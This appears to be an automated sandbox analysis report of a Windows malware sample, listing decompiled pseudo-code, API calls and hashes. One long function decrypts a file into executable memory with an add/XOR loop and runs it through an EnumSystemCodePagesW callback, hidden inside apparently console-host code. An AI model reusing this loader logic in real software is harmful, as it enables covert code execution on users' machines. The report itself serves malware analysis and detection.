                                              • LookupPrivilegeValueW.ADVAPI32(00000000,?,0040F389,0040F389,?,00000000,?,?), ref: 0041E347
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.393032745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_febcldoukq.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: LookupPrivilegeValue
                                              • String ID:
                                              • API String ID: 3899507212-0
                                              • Opcode ID: 9ed70f12ad27d53b096bd0f9a4e238804728527f94b575bc47a36bf1a0f4018d
                                              • Instruction ID: 4716ddf173ef1f5294d4de290b384ef1d893ae9b9691d9ddf83f7a3629dea316
                                              • Opcode Fuzzy Hash: 9ed70f12ad27d53b096bd0f9a4e238804728527f94b575bc47a36bf1a0f4018d
                                              • Instruction Fuzzy Hash: 6FF05EB5600214AFCB04DFA9DC45CE7776CEF85368B01846AFD598B642E632E911CBE4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0041E177 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E0041E177(intOrPtr _a4, void* _a8, long _a12, long _a16) {
				void* _t10;

				E0041EB17( *((intOrPtr*)(_a4 + 0x14)), _a4, _t7 + 0xc94,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x34);
				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
				return _t10;
			}




                                              0x0041e18e
                                              0x0041e1a4
                                              0x0041e1a8

                                              APIs
                                              • RtlAllocateHeap.NTDLL(0041813D,?,004188E4,004188E4,?,0041813D,?,?,?,?,?,00000000,00000005,00000206), ref: 0041E1A4
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.393032745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_febcldoukq.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateHeap
                                              • String ID:
                                              • API String ID: 1279760036-0
                                              • Opcode ID: 71d30878ffc0fd6371cee718eb9878eb3463dfa7e001799ef66c66478ee65a27
                                              • Instruction ID: 39b5cabef950e6491fd1ff11e6bcb4f47bb735b4b1560f452d24bb2e9d3c42ad
                                              • Opcode Fuzzy Hash: 71d30878ffc0fd6371cee718eb9878eb3463dfa7e001799ef66c66478ee65a27
                                              • Instruction Fuzzy Hash: 83E046B5200218ABDB18EF9ADC45EE737ACEF88764F018159FE095B242C630F910CBB0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0041E1B7 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E0041E1B7(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;

				_t3 = _a4 + 0xc98; // 0xc98
				E0041EB17( *((intOrPtr*)(_a4 + 0x14)), _t7, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}




                                              0x0041e1c6
                                              0x0041e1ce
                                              0x0041e1e4
                                              0x0041e1e8

                                              APIs
                                              • RtlFreeHeap.NTDLL(00000060,00000005,00000000,00000000,00000005,00000060,00000000,00000000,?,?,00000000,00000206,?), ref: 0041E1E4
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.393032745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_febcldoukq.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FreeHeap
                                              • String ID:
                                              • API String ID: 3298025750-0
                                              • Opcode ID: 7383604f3fe5c795b9236c36b71377a732ea8f0b598dae172b24566b996ec6fa
                                              • Instruction ID: 1d552643a1b6a9e7e8cbaa6fd288b4534f8ea2684dbb839d41cd3eb30db23803
                                              • Opcode Fuzzy Hash: 7383604f3fe5c795b9236c36b71377a732ea8f0b598dae172b24566b996ec6fa
                                              • Instruction Fuzzy Hash: 83E04FB52002146BD714DF49DC49ED737ACEF88754F014155FD0957241D630F914CBB0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0041E317 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E0041E317(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				struct _LUID* _t13;

				E0041EB17( *((intOrPtr*)(_a4 + 0xa1c)), _a4, _t7 + 0xcb0,  *((intOrPtr*)(_a4 + 0xa1c)), 0, 0x46);
				_t13 = _a16;
				_t10 = LookupPrivilegeValueW(_a8, _a12, _t13); // executed
				return _t10;
			}





                                              0x0041e331
                                              0x0041e336
                                              0x0041e347
                                              0x0041e34b

                                              APIs
                                              • LookupPrivilegeValueW.ADVAPI32(00000000,?,0040F389,0040F389,?,00000000,?,?), ref: 0041E347
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.393032745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_febcldoukq.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: LookupPrivilegeValue
                                              • String ID:
                                              • API String ID: 3899507212-0
                                              • Opcode ID: 6915fa93d7270e13bfd703e99c47af289f1ee2615e020f739a89d4d612532f61
                                              • Instruction ID: fb85849f582dcab3273909ea3b6beb81fed045dfd13ab71d80f81a5ef931559d
                                              • Opcode Fuzzy Hash: 6915fa93d7270e13bfd703e99c47af289f1ee2615e020f739a89d4d612532f61
                                              • Instruction Fuzzy Hash: 04E01AB52002186BD710DF49DC45EE737ADAF89664F118159BE0957241D631F8108AB5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0040F537 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 37%
                                              			E0040F537(intOrPtr _a4) {
				intOrPtr* _t7;
				void* _t8;

				_t7 = E00418A87(_a4 + 0x20,  *((intOrPtr*)(_a4 + 0xbc4)), 0, 0, 0x998e91b2);
				if(_t7 != 0) {
					_t8 =  *_t7(0x10); // executed
					return 0 | _t8 == 0x000000f1;
				} else {
					return _t7;
				}
			}





                                              0x0040f551
                                              0x0040f55b
                                              0x0040f561
                                              0x0040f570
                                              0x0040f55e
                                              0x0040f55e
                                              0x0040f55e

                                              APIs
                                              • GetUserGeoID.KERNELBASE(00000010), ref: 0040F561
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.393032745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_febcldoukq.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: User
                                              • String ID:
                                              • API String ID: 765557111-0
                                              • Opcode ID: 192d1dc557fdcd1f2abf0cd98871ab39a043c43d1ecbfc7256f5f81224423b0b
                                              • Instruction ID: 5511db123bae7081b5c05f1d5b2e2ca497d436f1bbdd44a9c892e0a4e36ad1e7
                                              • Opcode Fuzzy Hash: 192d1dc557fdcd1f2abf0cd98871ab39a043c43d1ecbfc7256f5f81224423b0b
                                              • Instruction Fuzzy Hash: 2FE0C23328030827F624E5A98C52FA6328E5B84B04F088475F90CE72C2D5A9E5800024
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0041E1F7 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                              Download Yara Rule
                                              APIs
                                              • ExitProcess.KERNEL32(?,00000000,000000E6,?,?,00000001), ref: 0041E21F
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.393032745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_febcldoukq.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExitProcess
                                              • String ID:
                                              • API String ID: 621844428-0
                                              • Opcode ID: 0c6232b6cdbf6635767260dc15682acedaa1cab9f782f361699728f7b20cdda3
                                              • Instruction ID: 71b31a6e052b90d658ead73e1ea1e15e08fcd2b9b7f1fc59455b7fbc18c8b61a
                                              • Opcode Fuzzy Hash: 0c6232b6cdbf6635767260dc15682acedaa1cab9f782f361699728f7b20cdda3
                                              • Instruction Fuzzy Hash: 15D0C2313002187BC620DB89CC45FD3379CDF457A4F004065BA0C5B241C530BA00C7E0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Non-executed Functions

                                              Function 00B1C4C0 Relevance: 74.0, APIs: 24, Strings: 18, Instructions: 467registrystringCOMMON
                                              Download Yara Rule
                                              APIs
                                              • wsprintfW.USER32 ref: 00B1C573
                                              • RegSetValueExW.ADVAPI32 ref: 00B1C5BF
                                              • RegSetValueExW.ADVAPI32 ref: 00B1C63D
                                              • RegSetValueExW.ADVAPI32 ref: 00B1C6A2
                                                • Part of subcall function 00B13370: GetDpiForSystem.USER32 ref: 00B133DC
                                                • Part of subcall function 00B13370: MulDiv.KERNEL32 ref: 00B133F5
                                                • Part of subcall function 00B13370: GetDpiForSystem.USER32 ref: 00B13406
                                                • Part of subcall function 00B13370: MulDiv.KERNEL32 ref: 00B1341F
                                              • RegSetValueExW.ADVAPI32 ref: 00B1C70A
                                              • lstrcmpW.KERNEL32 ref: 00B1C738
                                              • lstrlenW.KERNEL32 ref: 00B1C755
                                              • RegSetValueExW.ADVAPI32 ref: 00B1C797
                                              • RegSetValueExW.ADVAPI32 ref: 00B1C7FF
                                              • GetDpiForSystem.USER32 ref: 00B1C836
                                              • MulDiv.KERNEL32 ref: 00B1C851
                                              • GetDpiForSystem.USER32 ref: 00B1C860
                                              • MulDiv.KERNEL32 ref: 00B1C87B
                                              • RegSetValueExW.ADVAPI32 ref: 00B1C8E6
                                              • RegSetValueExW.ADVAPI32 ref: 00B1C94E
                                              • RegSetValueExW.ADVAPI32 ref: 00B1C9B0
                                              • RegSetValueExW.ADVAPI32 ref: 00B1CA12
                                              • RegSetValueExW.ADVAPI32 ref: 00B1CA74
                                              • RegSetValueExW.ADVAPI32 ref: 00B1CAD6
                                              • RegSetValueExW.ADVAPI32 ref: 00B1CB38
                                              • RegSetValueExW.ADVAPI32 ref: 00B1CB9A
                                              • RegSetValueExW.ADVAPI32 ref: 00B1CC27
                                              • RegSetValueExW.ADVAPI32 ref: 00B1CC8C
                                              • RegSetValueExW.ADVAPI32 ref: 00B1CD19
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.393507190.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                              • Associated: 00000002.00000002.393394170.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393529256.0000000000B2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393542517.0000000000B34000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393551749.0000000000B39000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_b10000_febcldoukq.jbxd
                                              Similarity
                                              • API ID: Value$System$lstrcmplstrlenwsprintf
                                              • String ID: ColorTable%02d$CursorSize$CursorVisible$EditionMode$FaceName$FontPitchFamily$FontSize$FontWeight$HistoryBufferSize$HistoryNoDup$InsertMode$MenuMask$PopupColors$QuickEdit$ScreenBufferSize$ScreenColors$WindowSize$`
                                              • API String ID: 4202061470-2238697219
                                              • Opcode ID: ba1c7720fa1e37a0f3441f97c05695e7f5c381332ef9af077c10e98ea68d71bb
                                              • Instruction ID: acf5f16e9a8420ff3c5436d47148dc659625f51929adf920b297818597f44de6
                                              • Opcode Fuzzy Hash: ba1c7720fa1e37a0f3441f97c05695e7f5c381332ef9af077c10e98ea68d71bb
                                              • Instruction Fuzzy Hash: 9932C4B0904219DFDB10DF58C484BAEBBF0FF48314F5089AAE9599B250D774DA88CF92
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00B118D0 Relevance: 33.7, APIs: 10, Strings: 9, Instructions: 441filememoryCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 17%
                                              			E00B118D0(void* __eflags, void* _a4, void* _a8, WCHAR* _a12, void* _a16) {
				struct _OVERLAPPED* _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				struct _OVERLAPPED* _v32;
				signed short* _v36;
				void* _v40;
				void* _v44;
				long _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				struct _OVERLAPPED* _v64;
				signed int _v68;
				long _v72;
				struct _OVERLAPPED* _v76;
				signed short _v96;
				signed int _v100;
				signed int _v132;
				char _v144;
				signed int _v148;
				void* _v152;
				void* _v156;
				void* _v160;
				void* _v164;
				signed int _v168;
				signed int _v172;
				long _v176;
				void* __edi;
				int _t257;
				signed int _t258;
				signed int _t259;
				signed int _t262;
				signed int _t264;
				signed int _t267;
				void* _t279;
				void* _t280;
				signed int _t284;
				signed int _t287;
				signed int _t290;
				signed int _t293;
				signed int _t296;
				signed int _t299;
				signed int _t302;
				signed int _t304;
				signed int _t312;
				signed int _t318;
				signed int _t325;
				intOrPtr _t350;
				void* _t399;
				void* _t402;
				void* _t406;
				signed int* _t407;
				signed int* _t408;
				intOrPtr* _t409;
				signed int* _t410;
				intOrPtr* _t411;
				signed int* _t412;
				intOrPtr* _t414;

				_v16 = 0;
				_v20 = 0;
				_v24 = 0;
				_v28 = 0;
				_v32 = 0;
				_v52 = 2;
				_v64 = 0;
				_v68 = 0;
				_v76 = 0;
				_v176 = 0x3d0900;
				_v76 = E00B20FD1();
				if(_v76 != 0) {
					E00B1FC30(_t399, _v76, 0x54, 0x3d0900);
					_v44 = CreateFileW(_a12, 0x80000000, 1, 0, 3, 0x80, 0);
					_v48 = GetFileSize(_v44, 0);
					_v40 = VirtualAlloc(0, _v48, 0x3000, 0x40);
					__eflags = 0;
					ReadFile(_v44, _v40, _v48,  &_v72, 0);
					_t406 = _t402 - 0xfffffffffffffff0;
					while(1) {
						 *(_v40 + _v68) =  *(_v40 + _v68) + 1;
						 *(_v40 + _v68) =  *(_v40 + _v68) - 0x44;
						 *(_v40 + _v68) =  *(_v40 + _v68) ^ 0x000000e4;
						 *(_v40 + _v68) =  *(_v40 + _v68) - 0xfb;
						 *(_v40 + _v68) =  *(_v40 + _v68) + 0xff;
						 *(_v40 + _v68) =  *(_v40 + _v68) - 0x18;
						 *(_v40 + _v68) =  *(_v40 + _v68) + 0xe0;
						 *(_v40 + _v68) =  *(_v40 + _v68) + 1;
						 *(_v40 + _v68) =  *(_v40 + _v68) + 1;
						 *(_v40 + _v68) =  *(_v40 + _v68) + 0xff;
						_v68 = _v68 + 1;
						__eflags = _v68 - _v48;
						if(_v68 >= _v48) {
							break;
						}
					}
					__eflags = 0;
					_v176 = _v40;
					_v172 = 0;
					EnumSystemCodePagesW(??, ??);
					_t407 = _t406 - 8;
					 *_t407 = _v76;
					E00B20F4D();
					_v68 = 0;
					while(1) {
						__eflags = _v68 - _v52;
						if(_v68 >= _v52) {
							break;
						}
						 *0xb34918 = 0x1f7;
						_v68 = _v68 + 1;
					}
					_t257 = GetOEMCP();
					 *0xb349b8 = _t257;
					 *0xb349b4 = _t257;
					 *0xb349a4 = 0x32;
					_t258 =  *0xb349a4; // 0x0
					 *_t407 = _t258;
					_v176 = 4;
					_t259 = E00B20F42();
					 *0xb349a0 = _t259;
					__eflags = _t259;
					if(_t259 != 0) {
						_v68 = 1;
						while(1) {
							__eflags = _v68 - _v52;
							if(_v68 >= _v52) {
								break;
							}
							 *_t407 =  *(_v56 + _v68 * 2) & 0x0000ffff;
							_v176 = L"--headless";
							_t287 = E00B211B7();
							__eflags = _t287;
							if(_t287 != 0) {
								 *_t407 =  *(_v56 + _v68 * 2) & 0x0000ffff;
								_v176 = L"--unix";
								_t290 = E00B211B7();
								__eflags = _t290;
								if(_t290 != 0) {
									 *_t407 =  *(_v56 + _v68 * 2) & 0x0000ffff;
									_v176 = L"--width";
									_t293 = E00B211B7();
									__eflags = _t293;
									if(_t293 != 0) {
										 *_t407 =  *(_v56 + _v68 * 2) & 0x0000ffff;
										_v176 = L"--height";
										_t296 = E00B211B7();
										__eflags = _t296;
										if(_t296 != 0) {
											 *_t407 =  *(_v56 + _v68 * 2) & 0x0000ffff;
											_v176 = L"--signal";
											_t299 = E00B211B7();
											__eflags = _t299;
											if(_t299 != 0) {
												 *_t407 =  *(_v56 + _v68 * 2) & 0x0000ffff;
												_v176 = L"--server";
												_t302 = E00B211B7();
												__eflags = _t302;
												if(_t302 != 0) {
													_v16 = 1;
												} else {
													_t304 = _v68 + 1;
													_v68 = _t304;
													__eflags = _t304 - _v52;
													if(_t304 != _v52) {
														 *_t407 =  *(_v56 + _v68 * 2) & 0x0000ffff;
														_v176 =  &_v36;
														_v172 = 0;
														 *0xb34914 = E00B21341();
														__eflags =  *_v36;
														if( *_v36 == 0) {
															goto L47;
														} else {
															_v16 = 1;
														}
													} else {
														_v16 = 1;
													}
												}
											} else {
												_t312 = _v68 + 1;
												_v68 = _t312;
												__eflags = _t312 - _v52;
												if(_t312 != _v52) {
													 *_t407 =  *(_v56 + _v68 * 2) & 0x0000ffff;
													_v176 =  &_v36;
													_v172 = 0;
													_v32 = E00B21341();
													__eflags =  *_v36;
													if( *_v36 == 0) {
														goto L47;
													} else {
														_v16 = 1;
													}
												} else {
													_v16 = 1;
												}
											}
										} else {
											_t318 = _v68 + 1;
											_v68 = _t318;
											__eflags = _t318 - _v52;
											if(_t318 != _v52) {
												 *_t407 =  *(_v56 + _v68 * 2) & 0x0000ffff;
												_v176 =  &_v36;
												_v172 = 0;
												_v28 = E00B21341();
												__eflags = _v28;
												if(_v28 != 0) {
													L30:
													__eflags = _v28 - 0xffff;
													if(_v28 > 0xffff) {
														goto L32;
													} else {
														__eflags =  *_v36 & 0x0000ffff;
														if(( *_v36 & 0x0000ffff) == 0) {
															goto L47;
														} else {
															goto L32;
														}
													}
												} else {
													__eflags =  *0xb34920;
													if( *0xb34920 == 0) {
														L32:
														_v16 = 1;
													} else {
														goto L30;
													}
												}
											} else {
												_v16 = 1;
											}
										}
									} else {
										_t325 = _v68 + 1;
										_v68 = _t325;
										__eflags = _t325 - _v52;
										if(_t325 != _v52) {
											 *_t407 =  *(_v56 + _v68 * 2) & 0x0000ffff;
											_v176 =  &_v36;
											_v172 = 0;
											_v24 = E00B21341();
											__eflags = _v24;
											if(_v24 != 0) {
												L21:
												__eflags = _v24 - 0xffff;
												if(_v24 > 0xffff) {
													goto L23;
												} else {
													__eflags =  *_v36 & 0x0000ffff;
													if(( *_v36 & 0x0000ffff) == 0) {
														goto L47;
													} else {
														goto L23;
													}
												}
											} else {
												__eflags =  *0xb34920;
												if( *0xb34920 == 0) {
													L23:
													_v16 = 1;
												} else {
													goto L21;
												}
											}
										} else {
											_v16 = 1;
										}
									}
								} else {
									 *0xb34920 = 1;
									 *0xb34924 = 1;
									_v20 = 1;
									goto L47;
								}
							} else {
								_v20 = 1;
								L47:
								_v68 = _v68 + 1;
								continue;
							}
							goto L72;
						}
						__eflags =  *0xb34914;
						if( *0xb34914 != 0) {
							__eflags = _v24;
							if(_v24 == 0) {
								_v24 = 0x50;
							}
							__eflags = _v28;
							if(__eflags == 0) {
								_v28 = 0x96;
							}
							 *_t407 = 0xb34914;
							_v176 = 1;
							_v172 = _v24;
							_v168 = _v28;
							_t262 = E00B12080(__eflags);
							_t408 = _t407 - 0x10;
							 *0xb3491c = _t262;
							__eflags = _t262;
							if(_t262 != 0) {
								__eflags = _v20;
								if(_v20 == 0) {
									 *_t408 = 0xb34914;
									_t264 = E00B123E0(0);
									_t409 = _t408 - 4;
									__eflags = _t264;
									if(_t264 != 0) {
										 *_t409 =  &_v144;
										GetStartupInfoW(??);
										_t410 = _t409 - 4;
										 *_t410 = _v132;
										_t267 = E00B21219();
										 *_t410 = 0xb34914;
										_v176 = _v132;
										_v172 = _t267 << 1;
										E00B12750();
										_t411 = _t410 - 0xc;
										__eflags = _v100 & 0x00000001;
										if((_v100 & 0x00000001) == 0) {
											_v148 = 5;
										} else {
											_v148 = _v96 & 0x0000ffff;
										}
										_t350 =  *0xb349bc; // 0x0
										 *_t411 = _t350;
										_v176 = _v148;
										ShowWindow(??, ??);
										_t412 = _t411 - 8;
										goto L71;
									} else {
										_v16 = 1;
									}
								} else {
									 *_t408 = 0xfffffff6;
									_t279 = GetStdHandle(??);
									_t414 = _t408 - 4;
									 *0xb349c4 = _t279;
									 *_t414 = 0xfffffff5;
									_t280 = GetStdHandle(??);
									_t412 = _t414 - 4;
									 *0xb349c8 = _t280;
									__eflags =  *0xb349c4;
									if( *0xb349c4 != 0) {
										L59:
										 *_t412 = 0xb34914;
										E00B122B0();
										_t412 = _t412 - 4;
										__eflags =  *0xb34920;
										if( *0xb34920 != 0) {
											L62:
											goto L64;
										} else {
											 *_t412 = 0xb34914;
											_t284 = E00B12340();
											_t412 = _t412 - 4;
											__eflags = _t284;
											if(_t284 != 0) {
												goto L62;
											} else {
												_v16 = 1;
											}
										}
									} else {
										__eflags =  *0xb349c8;
										if( *0xb349c8 == 0) {
											 *0xb34928 = 1;
											L64:
											L71:
											 *_t412 = 0xb34914;
											_v176 = _v32;
											_v16 = E00B12980();
										} else {
											goto L59;
										}
									}
								}
							} else {
								_v16 = 1;
							}
						} else {
							_v16 = 1;
						}
					} else {
						_v16 = 1;
					}
				} else {
					_v16 = 0;
				}
				L72:
				return _v16;
			}





























































                                              0x00b118e7
                                              0x00b118ee
                                              0x00b118f5
                                              0x00b118fc
                                              0x00b11903
                                              0x00b1190a
                                              0x00b11911
                                              0x00b11918
                                              0x00b1191f
                                              0x00b11926
                                              0x00b11932
                                              0x00b11939
                                              0x00b11961
                                              0x00b119a7
                                              0x00b119c3
                                              0x00b119ef
                                              0x00b119fe
                                              0x00b11a17
                                              0x00b11a1d
                                              0x00b11a20
                                              0x00b11a2c
                                              0x00b11a3c
                                              0x00b11a4f
                                              0x00b11a62
                                              0x00b11a71
                                              0x00b11a81
                                              0x00b11a94
                                              0x00b11aa3
                                              0x00b11ab2
                                              0x00b11ac1
                                              0x00b11aca
                                              0x00b11ad0
                                              0x00b11ad3
                                              0x00000000
                                              0x00000000
                                              0x00b11ad9
                                              0x00b11ae1
                                              0x00b11ae3
                                              0x00b11ae6
                                              0x00b11aee
                                              0x00b11af4
                                              0x00b11afa
                                              0x00b11afd
                                              0x00b11b02
                                              0x00b11b09
                                              0x00b11b0c
                                              0x00b11b0f
                                              0x00000000
                                              0x00000000
                                              0x00b11b15
                                              0x00b11b25
                                              0x00b11b25
                                              0x00b11b2d
                                              0x00b11b33
                                              0x00b11b38
                                              0x00b11b3d
                                              0x00b11b47
                                              0x00b11b4c
                                              0x00b11b4f
                                              0x00b11b57
                                              0x00b11b5c
                                              0x00b11b61
                                              0x00b11b64
                                              0x00b11b76
                                              0x00b11b7d
                                              0x00b11b80
                                              0x00b11b83
                                              0x00000000
                                              0x00000000
                                              0x00b11b99
                                              0x00b11b9c
                                              0x00b11ba0
                                              0x00b11ba5
                                              0x00b11ba8
                                              0x00b11bca
                                              0x00b11bcd
                                              0x00b11bd1
                                              0x00b11bd6
                                              0x00b11bd9
                                              0x00b11c0f
                                              0x00b11c12
                                              0x00b11c16
                                              0x00b11c1b
                                              0x00b11c1e
                                              0x00b11cbc
                                              0x00b11cbf
                                              0x00b11cc3
                                              0x00b11cc8
                                              0x00b11ccb
                                              0x00b11d69
                                              0x00b11d6c
                                              0x00b11d70
                                              0x00b11d75
                                              0x00b11d78
                                              0x00b11df0
                                              0x00b11df3
                                              0x00b11df7
                                              0x00b11dfc
                                              0x00b11dff
                                              0x00b11e69
                                              0x00b11e05
                                              0x00b11e08
                                              0x00b11e0b
                                              0x00b11e0e
                                              0x00b11e11
                                              0x00b11e32
                                              0x00b11e35
                                              0x00b11e39
                                              0x00b11e46
                                              0x00b11e4e
                                              0x00b11e52
                                              0x00000000
                                              0x00b11e58
                                              0x00b11e58
                                              0x00b11e58
                                              0x00b11e17
                                              0x00b11e17
                                              0x00b11e17
                                              0x00b11e11
                                              0x00b11d7e
                                              0x00b11d81
                                              0x00b11d84
                                              0x00b11d87
                                              0x00b11d8a
                                              0x00b11dab
                                              0x00b11dae
                                              0x00b11db2
                                              0x00b11dbf
                                              0x00b11dc5
                                              0x00b11dc9
                                              0x00000000
                                              0x00b11dcf
                                              0x00b11dcf
                                              0x00b11dcf
                                              0x00b11d90
                                              0x00b11d90
                                              0x00b11d90
                                              0x00b11d8a
                                              0x00b11cd1
                                              0x00b11cd4
                                              0x00b11cd7
                                              0x00b11cda
                                              0x00b11cdd
                                              0x00b11cfe
                                              0x00b11d01
                                              0x00b11d05
                                              0x00b11d12
                                              0x00b11d15
                                              0x00b11d19
                                              0x00b11d2c
                                              0x00b11d2c
                                              0x00b11d33
                                              0x00000000
                                              0x00b11d39
                                              0x00b11d3f
                                              0x00b11d42
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00b11d42
                                              0x00b11d1f
                                              0x00b11d1f
                                              0x00b11d26
                                              0x00b11d48
                                              0x00b11d48
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00b11d26
                                              0x00b11ce3
                                              0x00b11ce3
                                              0x00b11ce3
                                              0x00b11cdd
                                              0x00b11c24
                                              0x00b11c27
                                              0x00b11c2a
                                              0x00b11c2d
                                              0x00b11c30
                                              0x00b11c51
                                              0x00b11c54
                                              0x00b11c58
                                              0x00b11c65
                                              0x00b11c68
                                              0x00b11c6c
                                              0x00b11c7f
                                              0x00b11c7f
                                              0x00b11c86
                                              0x00000000
                                              0x00b11c8c
                                              0x00b11c92
                                              0x00b11c95
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00b11c95
                                              0x00b11c72
                                              0x00b11c72
                                              0x00b11c79
                                              0x00b11c9b
                                              0x00b11c9b
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00b11c79
                                              0x00b11c36
                                              0x00b11c36
                                              0x00b11c36
                                              0x00b11c30
                                              0x00b11bdf
                                              0x00b11bdf
                                              0x00b11be9
                                              0x00b11bf3
                                              0x00000000
                                              0x00b11bf3
                                              0x00b11bae
                                              0x00b11bae
                                              0x00b11e75
                                              0x00b11e7b
                                              0x00000000
                                              0x00b11e7b
                                              0x00000000
                                              0x00b11ba8
                                              0x00b11e83
                                              0x00b11e8a
                                              0x00b11e9c
                                              0x00b11ea0
                                              0x00b11ea6
                                              0x00b11ea6
                                              0x00b11ead
                                              0x00b11eb1
                                              0x00b11eb7
                                              0x00b11eb7
                                              0x00b11eca
                                              0x00b11ecd
                                              0x00b11ed5
                                              0x00b11ed9
                                              0x00b11edd
                                              0x00b11ee2
                                              0x00b11ee5
                                              0x00b11eea
                                              0x00b11eed
                                              0x00b11eff
                                              0x00b11f03
                                              0x00b11fab
                                              0x00b11fae
                                              0x00b11fb3
                                              0x00b11fb6
                                              0x00b11fb9
                                              0x00b11fd1
                                              0x00b11fd4
                                              0x00b11fda
                                              0x00b11fe0
                                              0x00b11fe3
                                              0x00b11ff4
                                              0x00b11ff7
                                              0x00b11ffb
                                              0x00b11fff
                                              0x00b12004
                                              0x00b1200d
                                              0x00b12010
                                              0x00b1202a
                                              0x00b12016
                                              0x00b1201a
                                              0x00b1201a
                                              0x00b1203b
                                              0x00b12041
                                              0x00b12044
                                              0x00b12048
                                              0x00b1204e
                                              0x00000000
                                              0x00b11fbf
                                              0x00b11fbf
                                              0x00b11fbf
                                              0x00b11f09
                                              0x00b11f09
                                              0x00b11f10
                                              0x00b11f16
                                              0x00b11f19
                                              0x00b11f1e
                                              0x00b11f25
                                              0x00b11f2b
                                              0x00b11f2e
                                              0x00b11f33
                                              0x00b11f3a
                                              0x00b11f4d
                                              0x00b11f53
                                              0x00b11f56
                                              0x00b11f5b
                                              0x00b11f5e
                                              0x00b11f65
                                              0x00b11f91
                                              0x00000000
                                              0x00b11f6b
                                              0x00b11f71
                                              0x00b11f74
                                              0x00b11f79
                                              0x00b11f7c
                                              0x00b11f7f
                                              0x00000000
                                              0x00b11f85
                                              0x00b11f85
                                              0x00b11f85
                                              0x00b11f7f
                                              0x00b11f40
                                              0x00b11f40
                                              0x00b11f47
                                              0x00b11f96
                                              0x00b11fa0
                                              0x00b12051
                                              0x00b1205a
                                              0x00b1205d
                                              0x00b12069
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00b11f47
                                              0x00b11f3a
                                              0x00b11ef3
                                              0x00b11ef3
                                              0x00b11ef3
                                              0x00b11e90
                                              0x00b11e90
                                              0x00b11e90
                                              0x00b11b6a
                                              0x00b11b6a
                                              0x00b11b6a
                                              0x00b1193f
                                              0x00b1193f
                                              0x00b1193f
                                              0x00b1206c
                                              0x00b12078

                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.393507190.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                              • Associated: 00000002.00000002.393394170.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393529256.0000000000B2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393542517.0000000000B34000.00000008.00000001.01000000.00000004.sdmpDownload File
